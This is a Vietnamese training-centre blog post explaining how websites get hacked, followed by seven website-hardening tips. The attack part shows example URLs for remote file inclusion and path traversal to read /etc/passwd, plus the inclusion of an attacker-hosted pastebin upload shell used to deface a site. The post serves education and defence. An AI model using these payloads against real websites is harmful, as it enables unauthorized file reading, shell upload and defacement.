Hacker đã Hack các website ra sao? Và cách chống hack trang web

19:52 15-04-2021BKAP Media

Có lẽ, ai trong chúng ta cũng từng thấy 1 trang web bị hack (tấn công) và thay đổi giao diện hiển thị là anonymous, haked by xyz… Vậy làm thế nào các hacker có thể làm được điều đó? Hiểu được cách thức hacker tấn công webiste từ đó đưa ra cách phòng chống hack!


1. CÁC WEBSITE ĐÃ BỊ HACK RA SAO?


Cho tới hiện tại thì có 3 cách phổ biến:

  • Reomote File Include (RFI)
  • SQL injection
  • Cross-site Scripting

Đặc điểm cả 3 đều thực hiện upload file hay còn gọi là tải file độc hại lên server thậm chí PHP, HTML, JS, …. Đầu tiên chúng ta đi đến cách đầu tiên: Remote File Include (RFI)

Lỗ hổng File Inclusion cho phép tin tặc truy cập trái phép vào những tập tin nhạy cảm trên máy chủ web hoặc thực thi các tệp độc hại bằng cách sử dụng chức năng “include”. Lỗ hổng này xảy ra do cơ chế kiểm tra đầu vào không được thực hiện tốt, khiến tin tặc có thể khai thác và chèn các dữ liệu độc hại.

Bắt đầu thôi!

Ví dụ ta có site này

  abc. com/index.php?page=photos.php 

Giải thích như sau: trang PHP kia sẽ đọc file từ photos.php mà biến page đã được gán. Lúc này nếu sơ hở không lọc kỹ càng, các hacker sẽ lợi dụng lỗ hổng này để khai thác và đoc nhiều file nhạy cảm hơn password.

Đến đây ta thử thành đường dẫn google

  abc. com/index.php?page=http:// google.com 

Tada, hiên ra nguyên trang search google

hacker hack trang web như thế nào

Vậy là index.php không lọc input đầu vào, ta có thể đọc được file password không? Ban đầu mình thử etc/passwd

  abc. com/index.php?page=etc/passwd 

Kết quả khoog show ra gì. Tiếp tục sử dụng kĩ thuật path lên 1 thư mục bằng ../

  abc. com/index.php?page=../etc/passwd 

Vẫn không hiện, tiếp tục path

  abc. com/index.php?page=../../etc/passwd 

Cuối cùng, nguyên passwd đã lộ ra sau 2 lần thử

hacker hack trang web như thế nào

Chưa dừng lại ở đây. Nếu có thể đọc được bất kỳ file nào. Sao ta không thử đọc 1 file với mục đích upload file lên server. Chuẩn bị 1 file uploadShell.php. Copy code vào pastebin nhằm mục đích lấy link. Sau một hồi ta được 1 link với code php để upload file, được kết quả như sau:

  abc. com/index.php?page=https:// pastebin. com/xyz 

Giờ chỉ cần tới công đoạn up file bất kỳ nào lên thôi tùy mục đích của hacker. Trong video mình muốn ghi đè file dispo_call.php nên mình đã tạo 1 file php y chang nhưng source code là trang web giao diện thông báo trang web này đã bị hack. Cuối cùng thành công, hoàn thành thử thách.

hacker đã hack trang web như thế nào


CHỐNG HACK TRANG WEBSITE VỚI 7 BƯỚC SAU:


Nếu bạn là chủ một website, còn điều gì đáng sợ hơn việc một ngày bạn phát hiện website bị hack. Vậy làm thế nào để hạn chế và phòng chống hack website? Ngoài việc thường xuyên sao lưu các tập tin của mình, bảy bước sau đây sẽ giúp bạn bảo mật web tốt hơn và phòng chống hack website.

1. Luôn cập nhật website

Điều đầu tiên bạn nên làm để phòng chống hack website là đảm bảo rằng website của bạn được cập nhật phiên bản mới nhất. Bởi vì nhiều công cụ được tạo ra dưới dạng các chương trình phần mềm mã nguồn mở, mã code của các công cụ này rất dễ sử dụng cho cả các nhà phát triển cũng như các hacker mũ đen. Các hacker có thể xem các mã này, tìm kiếm những lỗ hổng bảo mật và khai thác để tấn công các website. Người dùng WordPress có thể kiểm tra các bản cập nhật một cách nhanh chóng khi họ đăng nhập vào bảng điều khiển WordPress của họ.

Thông báo update trên nền tảng WordPress mà bạn không nên bỏ lỡ

Thông báo update trên nền tảng WordPress mà bạn không nên bỏ lỡ

2. Giải pháp chống hack website

Khi bạn đã cập nhật tất cả mọi thứ, hãy tăng cường bảo mật trang web của bạn với các plugin chuyên dụng để ngăn chặn các nỗ lực tìm cách xâm nhập. Chi phí phòng chống luôn rẻ hơn. Tìm kiếm một nền tảng an ninh mạng uy tín. Với giải pháp cung cấp rất nhiều tính năng bảo mật ưu việt. Từ việc quét và phát hiện các lỗ hổng bảo mật trang, giám sát website liên tục 24/7 cho đến việc phát hiện và làm sạch mã độc hay xây dựng tường lửa bảo vệ website. Nếu doanh nghiệp của bạn hoạt động dựa vào trang web của mình. Đây chắc chắn là một khoản đầu tư đáng để xem xét.

3. Sử dụng HTTPS

Kích hoạt HTTPS cho website của mình. 

4. Sử dụng Parameter để truy vấn CSDL

Một trong những thủ thuật phổ biến khiến các website bị hack là tấn công SQL Injection. Tin tặc có thể khai thác SQL Injection thông qua các tham số và form trên website của bạn. Tin tặc có thể tấn công vào cơ sở dữ liệu – nơi có thể chứa thông tin khách hàng nhạy cảm như thông tin liên lạc hoặc số thẻ tín dụng. Rõ ràng bảo mật những thông tin đó là nhiệm vụ của bạn. Có một số bước bạn có thể thực hiện để bảo vệ trang web của bạn khỏi SQL Injection. Một trong những điều quan trọng nhất và dễ thực hiện nhất là sử dụng truy vấn PARAMETER. Bạn nên sử dụng các thư viện ORM để cài đặt cơ chế Parameter này.

5. Sử dụng CSP

Tương tự như SQL Injection, XSS cũng là một lỗ hổng cực kỳ nguy hiểm. Chúng xuất hiện khi các hacker tìm cách để đưa mã JavaScript độc hại vào trang web. Thực thi trên máy người dùng để đánh cắp phiên đăng nhập hoặc cài đặt mã độc. Để bảo vệ trang web của bạn khỏi các cuộc tấn công XSS, một công cụ hữu ích giúp bạn tự bảo vệ mình khỏi XSS là CSP (Content Security Policy – CSP). Sử dụng CSP chỉ đơn giản là vấn đề bổ sung đúng tiêu đề HTTP cho trang web của bạn, cung cấp một chuỗi các chỉ thị cho biết trình duyệt có tên miền nào là ổn và bất kỳ ngoại lệ nào đối với quy tắc này. Bạn có thể tìm thấy các chi tiết về cách tạo tiêu đề CSP cho trang web của bạn do Mozilla cung cấp.

6. Mật khẩu an toàn

Điều này nghe có vẻ đơn giản, nhưng nó rất quan trọng. Bạn muốn tạo mật khẩu mà bạn biết sẽ luôn luôn dễ dàng để bạn nhớ. Đó là lý do tại sao mật khẩu #1 phổ biến nhất vẫn là 123456. Tuy nhiên bạn phải khiến nó phức tạp hơn rất nhiều. Nên sử dụng một hỗn hợp các ký tự đặc biệt, số và chữ cái. Và tránh xa những từ khóa có thể dễ đoán đoán như ngày sinh nhật của bạn hoặc tên của con cái….. Nếu một hacker nào đó có được quyền truy cập vào các thông tin khác về bạn, họ sẽ biết để đoán ra. Và đảm bảo rằng tất cả những ai có quyền truy cập vào trang web của bạn đều có mật khẩu bảo mật tương tự. Đặt ra các yêu cầu về độ dài và loại ký tự mà mọi người cần phải sử dụng để họ phải sáng tạo hơn là việc tiếp tục sử dụng các mật khẩu tiêu chuẩn, dễ đoán gây nên các vấn đề nghiêm trọng về bảo mật và khiến cho website bị hack.

7. Phân quyền truy cập chặt chẽ

Bây giờ, đối với bước cuối cùng này, có thể chúng ta sẽ đòi hỏi phải biết một chút về kỹ thuật. Tất cả các trang web có thể được tạo bởi một loạt các tập tin và thư mục được lưu trữ trên máy chủ. Bên cạnh việc chứa tất cả các tập lệnh và dữ liệu cần thiết để làm cho trang web của bạn hoạt động. Mỗi tập tin và thư mục phải được gán cho một tập hợp các quyền thực thi nhất định. Bạn phải chắc chắn kiểm soát việc ai có thể đọc, ghi và thực thi các tệp tin trên máy chủ. Nên thiết lập 1 tài khoản máy chủ riêng để chạy dịch vụ website của bạn.


> Chọn Bachkhoa-Aptech - Cán đích sự nghiệp An ninh mạng: https://bit.ly/2L0TreC

  • HỆ THỐNG ĐÀO TẠO CNTT QUỐC TẾ BACHKHOA-APTECH
  • Hotline: 0968276996
  • Địa chỉ: 238 Hoàng Quốc Việt, Bắc Từ Liêm, Hà Nội
   0968276996
< wire:id="udDCQp1xoIpO4raZEZ9n" wire:initial-data="{"fingerprint":{"id":"udDCQp1xoIpO4raZEZ9n","name":"embedded.footer","locale":"vn"},"effects":{"listeners":[]},"serverMemo":{"children":[],"errors":[],"htmlHash":"26380eb1","data":[],"dataMeta":[],"checksum":"d1961915ce172f5da6fbe8e4351821ae570bbc74df53913c80ec05a5ae53a231"}}"!-- Messenger Plugin chat Code -->